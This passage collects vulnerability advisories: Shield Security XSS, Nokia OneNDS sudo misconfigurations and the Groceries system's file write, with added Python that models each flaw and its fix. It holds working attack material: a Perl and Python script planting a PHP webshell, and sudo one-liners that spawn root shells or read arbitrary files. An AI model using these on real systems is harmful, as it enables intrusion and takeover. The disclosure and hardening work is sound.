“Meta” tag icon on an audit log entry. Unfortunately, the metadata was not escaped when it was output. While most of the metadata collected about a request has a very strict format and can only be spoofed to a limited extent, User-Agent strings are free-form text, and we were able to inject a script in an iframe in the User-Agent header that fired when an administrator viewed an event entry.<br /><br />While this exploit does technically require user interaction, it can be considered “Passive” user interaction, that is, it does not require tricking the administrator into performing any actions they might not have performed otherwise. Depending on the payload used, an attacker could use the script executing in the administrator’s browser to create a new administrator account under their control. Additionally, this exploit can be automated, and can be exploited by unauthenticated attackers via a variety of vectors, at least one of which is likely to be present in most common site configurations. As such it earns its High severity rating.<br /><br />The second vulnerability was much lower in severity and consisted of a missing authorization check on the ‘edit-theme-plugin-file’ AJAX action, which is used to record edits to plugin or theme files. The primary consequence of this is that an authenticated attacker can spoof an audit log entry indicating that any file belonging to any plugin or theme on the site was edited. While this is primarily a nuisance, since it can be used to create audit log entries it is yet another vector to exploit the aforementioned Cross-Site Scripting vulnerability.<br /><br />Disclosure Timeline<br /><br />March 20, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. We responsibly disclose the vulnerabilities to the developer, who responds quickly and releases a patch in version 17.0.18.<br /><br />April 19, 2023 – The firewall rule becomes available to all Wordfence users.<br /><br />Conclusion<br /><br />In today’s post, we detailed a High Severity Cross-Site Scripting vulnerability in Shield Security. We also detailed a lower-severity issue allowing authenticated attackers to spoof audit log entries indicating that plugin and theme files had been edited. These vulnerabilities have been fully patched in version 17.0.18.<br /><br />Wordfence Premium, Care, and Response users received a firewall rule to protect against any exploits targeting this vulnerability on March 20, 2023.  Sites still using the free version of Wordfence received the same protection on April 19, 2023.<br /><br />If you know a friend or colleague who is using the Shield Security plugin on their site, we highly recommend forwarding this advisory to them as the Cross-Site Scripting vulnerability can allow unauthenticated attackers to execute malicious JavaScript in an administrator’s browser, which can lead to site takeover.<br /><br />If you are a security researcher, you can responsibly disclose your findings to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. Thanks to Paul Goodchild from Shield Security for patching the issue quickly.<br /><br /></code></pre>
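Both the contact-form finding in the Old Age Home Management System advisory above and the Shield Security audit-log issue come down to the same defect: user-supplied text written into HTML without output escaping. The Python below is an added example, not code from either project. It renders a constructed audit-log entry (with an iframe payload in the User-Agent, as in the Shield Security report) and a constructed contact-form submission (with a script tag, as in the Old Age Home PoC) through an unescaped template and through html.escape, and checks which output still carries a script-capable tag.

```python
import html
import re

# Constructed payloads of the two kinds the advisories describe: an iframe carried in a
# User-Agent header, and a script tag submitted through a contact form
PAYLOAD_UA = '<iframe srcdoc="<script>alert(1)</script>"></iframe>'
PAYLOAD_FIELD = "<script>alert('or4ng')</script>"

# Constructed records as each application would have stored them
AUDIT_META = {"ip": "203.0.113.7", "event": "app_password_fail", "user_agent": PAYLOAD_UA}
CONTACT_FORM = {"fname": PAYLOAD_FIELD, "lname": "Doe", "message": PAYLOAD_FIELD}

# Elements that can run script or load content when they appear as real tags
TAG_RE = re.compile(r"<\s*/?\s*(script|iframe|img|svg|object)\b", re.I)


def render_unsafe(fields):
    """Interpolate stored values straight into markup: the bug in both applications."""
    return "".join(f"<tr><td>{k}</td><td>{v}</td></tr>" for k, v in fields.items())


def render_safe(fields):
    """Escape on output for the HTML text context. The stored value is left untouched,
    so the audit log still shows the attacker's real User-Agent, just inert."""
    return "".join(
        f"<tr><td>{html.escape(str(k))}</td><td>{html.escape(str(v))}</td></tr>"
        for k, v in fields.items()
    )


def survives_as_markup(rendered):
    """True if a script-capable element is present as a real tag in the output."""
    return TAG_RE.search(rendered) is not None


if __name__ == "__main__":
    for name, record in (("audit log entry", AUDIT_META), ("contact form", CONTACT_FORM)):
        print(f"{name}: unsafe -> {survives_as_markup(render_unsafe(record))}, "
              f"safe -> {survives_as_markup(render_safe(record))}")
```

html.escape converts the five HTML-significant characters, which is the right fix for values placed in element content or in quoted attributes; values placed into JavaScript or URLs need their own context-specific encoding instead.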
<pre><code># Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution (RCE)<br /># Date: 4/23/2023<br /># Author: Or4nG.M4n<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: windows<br />#<br /># Vuln File : classes/SystemSettings.php < unauthenticated arbitrary file write: the request controls both the file name (array key) and its content (value)<br /># if(isset($_POST['content'])){<br /># foreach($_POST['content'] as $k => $v)<br /># file_put_contents("../{$k}.html",$v); <=== put any code into welcome.html or whatever you want<br /># }<br /># Vuln File : home.php < includes the written file, so PHP code stored in it executes<br /># <h3 class="text-center">Welcome</h3><br /># <hr><br /># <div class="welcome-content"><br /># <?php include("welcome.html") ?> <=== include <br /># </div><br /><br /># Perl Code<br />use strict;<br />use warnings;<br />use LWP::UserAgent;<br /><br />print "Target Url #";<br />my $url = <STDIN>;<br />chomp $url;<br /># webshell that runs the cmd parameter once welcome.html is include()d by home.php<br />my $backdoor = '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'; <br />my $ua = LWP::UserAgent->new();<br />my $response = $ua->post( $url."/classes/SystemSettings.php?f=update_settings", { 'content[welcome]' => $backdoor } );<br />print "[+] injection in welcome page (HTTP ".$response->code.")\n";<br />print "[+] backdoor url ".$url."/?cmd=ls -al\n";<br /><br /># Python Code<br /><br />import requests<br /><br />url = input("Enter url :").rstrip("/")<br /># same webshell as above, stored as welcome.html and include()d by home.php<br />backdoor = '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'<br />postdata = {'content[welcome]': backdoor}<br />resp = requests.post(url + "/classes/SystemSettings.php?f=update_settings", data=postdata, timeout=10)<br />print("[+] injection in welcome page (HTTP %d)" % resp.status_code)<br />print("[+] " + url + "/?cmd=ls -al")<br /></code></pre>
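The PHP handler quoted above lets the request pick both the file name (through the array key, which is also a path-traversal vector because it is spliced into "../{$k}.html") and the content, and home.php then include()s the result. The Python below is an added example, not the application's code: it models that handler and a hardened version that requires an admin session, allow-lists the fragment name and refuses PHP open tags. The web root it writes into is a temporary directory it creates and removes; the allowed key set is assumed.

```python
import os
import re
import shutil
import tempfile

ALLOWED_KEYS = {"welcome", "about"}          # assumed: the fragments an admin may edit
KEY_RE = re.compile(r"^[a-z_]{1,32}$")       # no slashes, dots or traversal possible


def update_settings_vulnerable(web_root, content):
    """What the PHP does: the request controls the file name (../{k}.html relative to
    classes/) and the body, which home.php later include()s, so PHP tags in it run."""
    classes_dir = os.path.join(web_root, "classes")
    written = []
    for key, value in content.items():
        path = os.path.normpath(os.path.join(classes_dir, "..", f"{key}.html"))
        with open(path, "w") as fh:
            fh.write(value)
        written.append(path)
    return written


def update_settings_hardened(web_root, content, session):
    """Require an admin session, allow-list the key, and refuse fragments containing a
    PHP open tag so nothing written here is ever executed by the include()."""
    if not session.get("is_admin"):
        raise PermissionError("admin login required")
    written = []
    for key, value in content.items():
        if key not in ALLOWED_KEYS or not KEY_RE.match(key):
            raise ValueError(f"rejected key {key!r}")
        if "<?" in value:
            raise ValueError("PHP open tag in fragment")
        path = os.path.join(web_root, f"{key}.html")
        with open(path, "w") as fh:
            fh.write(value)
        written.append(path)
    return written


# Constructed webshell of the kind the exploit above stores
BACKDOOR = '<?php if(isset($_REQUEST["cmd"])){ system($_REQUEST["cmd"]); } ?>'


def run_demo():
    """Exercise both handlers in a throwaway web root and report what each one did."""
    base = tempfile.mkdtemp()
    web_root = os.path.join(base, "groceries")
    os.makedirs(os.path.join(web_root, "classes"))
    result = {"hardened_blocks": {}}
    try:
        paths = update_settings_vulnerable(web_root, {"welcome": BACKDOOR})
        result["vuln_writes_welcome"] = paths == [os.path.join(web_root, "welcome.html")]
        with open(paths[0]) as fh:
            result["vuln_stores_php"] = fh.read().startswith("<?php")
        # a traversal key lands the file above the web root
        paths = update_settings_vulnerable(web_root, {"../escaped": "x"})
        result["vuln_escapes_root"] = paths == [os.path.join(base, "escaped.html")]
        cases = {
            "no_session": dict(content={"welcome": "<p>hi</p>"}, session={}),
            "bad_key": dict(content={"../escaped": "x"}, session={"is_admin": True}),
            "php_tag": dict(content={"welcome": BACKDOOR}, session={"is_admin": True}),
        }
        for label, kwargs in cases.items():
            try:
                update_settings_hardened(web_root, **kwargs)
                result["hardened_blocks"][label] = False
            except (PermissionError, ValueError):
                result["hardened_blocks"][label] = True
        ok = update_settings_hardened(web_root, {"welcome": "<p>hi</p>"}, {"is_admin": True})
        result["hardened_allows_plain"] = ok == [os.path.join(web_root, "welcome.html")]
    finally:
        shutil.rmtree(base)
    return result


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, v)
```

Even with the checks in place, storing admin-supplied HTML that is later include()d is fragile; reading the fragment with file_get_contents and echoing it would remove the execution path entirely.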
<pre><code>===============================================================================<br /> title: Incorrect Permission Assignment<br /> product: Nokia OneNDS 20.9<br />vulnerability type: Security Misconfiguration<br /> severity: High<br /> CVSS Score: 7.8<br /> CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /> found on: 04/05/2022<br /> by: Giacomo Sighinolfi <giacomosighinolfi@gmail.com><br /> cve: CVE-2022-30759<br />===============================================================================<br /><br />Some sudo permissions can be exploited by some users to escalate to root <br />privileges and execute arbitrary commands on the system.<br /><br />The affected users are:<br /> Provgw, notifs, dbmrun, (system users)<br />They can run as root the following script:<br /> /opt/cntdb/bin/noscripts_rpm.sh<br />It can be exploited with:<br /> sudo /opt/cntdb/bin/noscripts_rpm.sh force-erase <br /> "--eval '%{lua:os.execute(\"/bin/sh\")}'"<br /><br /><br />=============================================================================== <br /><br />Detailed analysis:<br /><br />The script accepts as its first argument one of these options: <br /> install|update|fallback|erase|test-install|test-update|test-erase|<br /> force-install|force-update|force-erase <br />and as its second argument an arbitrary rpm package name.<br /><br />The switch/case block (row 175) shows how the first argument influences the execution of the script.<br />175. case "$1" in<br />…<br />224. test-erase)<br />225. TEST_OPTION="--test"<br />226. OPTION="-e"<br />227. ;;<br />…<br />238. force-erase)<br />239. TEST_OPTION="--nodeps"<br />240. OPTION="-e"<br />241. ;;<br />…<br />Using “force-erase” or “test-erase” as the first argument sets the “OPTION” <br />variable to “-e”. That value lets us trigger a privilege escalation through the rpm command (row 254) with a crafted second parameter: the double-quoted argument reaches the script as a single $2, but because $2 is expanded unquoted on row 254 the shell splits it into two words, --eval and the macro, which rpm then evaluates as root.<br />…<br />252. if [ $OPTION == "-e" ]<br />253. then<br />254. rpm $OPTION --noscripts $TEST_OPTION $2<br />…<br /><br />===============================================================================<br /></code></pre>
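The mechanism is the unquoted $2 on row 254. The Python below is an added example, not Nokia's script: it reproduces the argv that rpm receives from the unquoted expansion and from a quoted one (word splitting is modelled with str.split(), which matches the default IFS of space, tab and newline), and shows the validated form a wrapper like this should use. The package name and the macro payload are taken from the advisory; nothing here runs rpm.

```python
import re

# The advisory's second argument: one shell word, because it was double-quoted on the command line
PAYLOAD = "--eval '%{lua:os.execute(\"/bin/sh\")}'"

# Conservative shape for an rpm package name: never starts with '-', never contains '%', whitespace or quotes
PKG_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]*$")


def wrapper_argv_unquoted(option, test_option, pkg):
    """What `rpm $OPTION --noscripts $TEST_OPTION $2` hands to rpm: an unquoted expansion is
    split on IFS whitespace, so $2 turns into two words. The quote characters inside the
    value stay literal, but rpm still expands the %{lua:...} macro in the second word."""
    return ["rpm", option, "--noscripts", *test_option.split(), *pkg.split()]


def wrapper_argv_quoted(option, test_option, pkg):
    """With "$2" quoted the value stays a single argv element; rpm would treat
    '--eval ...' as one unknown option rather than as --eval followed by a macro."""
    return ["rpm", option, "--noscripts", *test_option.split(), pkg]


def is_valid_pkg_name(pkg):
    """True only for names that cannot be mistaken for options or macros."""
    return PKG_NAME_RE.match(pkg) is not None


def safe_rpm_erase_argv(pkg, test=False, nodeps=False):
    """Hardened form: validate the name, build argv as a list (no shell), and end option
    parsing with '--' so that nothing the caller supplies can be read as an rpm option."""
    if not is_valid_pkg_name(pkg):
        raise ValueError(f"invalid package name: {pkg!r}")
    argv = ["rpm", "-e", "--noscripts"]
    if test:
        argv.append("--test")
    if nodeps:
        argv.append("--nodeps")
    argv += ["--", pkg]
    return argv


if __name__ == "__main__":
    print("unquoted $2:", wrapper_argv_unquoted("-e", "--nodeps", PAYLOAD))
    print("quoted $2:  ", wrapper_argv_quoted("-e", "--nodeps", PAYLOAD))
    print("validated:  ", safe_rpm_erase_argv("bash-4.2.46-34.el7", nodeps=True))
    print("payload accepted by validator:", is_valid_pkg_name(PAYLOAD))
```

Quoting "$2" alone closes this particular path but still passes attacker-chosen text to a root rpm; the name check and the '--' terminator are what remove the option-injection surface, and in this case the sudo rule itself should be narrowed rather than relying on the wrapper.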
<pre><code>===============================================================================<br /> title: Incorrect Permission Assignment<br /> product: Nokia OneNDS 17<br />vulnerability type: Security Misconfiguration<br /> severity: High<br /> CVSS Score: 7.8<br /> CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br /> found on: 31/03/2022<br /> by: Giacomo Sighinolfi, Milena Mangiola, <br /> Savino Sisco, Valerio Casalino<br /> cve: CVE-2022-31244<br />===============================================================================<br /><br />Some sudo permissions can be exploited by the users that have specific roles<br />to escalate to root privileges and execute arbitrary commands on the system.<br /><br />The affected roles are:<br />ONENDS_CC_BASIC_ADMIN: <br /> - it can run /sbin/service <br /> - can be exploited using `sudo /sbin/service ../../bin/sh`<br />ONENDS_CC_SERVICE_ADMIN: <br /> - it can run /bin/rpm <br /> - can be exploited using `sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'`<br />ONENDS_CC_NETWORK_MANAGEMENT: <br /> - it can run /sbin/ip,/sbin/arp <br /> - can be exploited using `sudo /sbin/ip -force -batch 'file_to_read'`<br /> - can be exploited using `sudo /sbin/arp -v -f 'file_to_read'`<br /><br />===============================================================================<br /></code></pre>